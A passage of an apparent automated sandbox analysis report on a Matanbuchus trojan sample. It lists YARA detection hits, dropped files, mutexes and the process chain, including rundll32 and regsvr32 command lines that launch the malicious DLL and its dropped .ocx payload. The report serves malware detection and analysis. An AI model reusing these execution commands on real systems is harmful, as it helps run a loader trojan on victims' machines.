            Source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPEDMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: classification engineClassification label: mal100.troj.evad.winDLL@52/7@3/2
            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8f08
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7584
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f03c22d8-5435-4c04-83ee-cce6b2ae6093
            Source: useraccount.aspx.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
            Source: useraccount.aspx.dllVirustotal: Detection: 27%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitialize
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInstall
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInit
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitialize
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInstall
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_setopt
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_perform
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_init
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_cleanup
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",_Uninitialize
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UnregisterDll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Uninitialize
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ThreadFunction
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Main
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Init
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportDll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Export
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllUninitialize
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitializeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInstallJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitializeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInstallJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_setoptJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_performJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_initJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_cleanupJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",_UninitializeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UnregisterDllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UninitializeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ThreadFunctionJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",MainJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",InitJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportDllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllUninitializeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
            Source: C:\Windows\System32\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: useraccount.aspx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            barindex
            Source: Yara matchFile source: useraccount.aspx.dll, type: SAMPLE
            Source: Yara matchFile source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
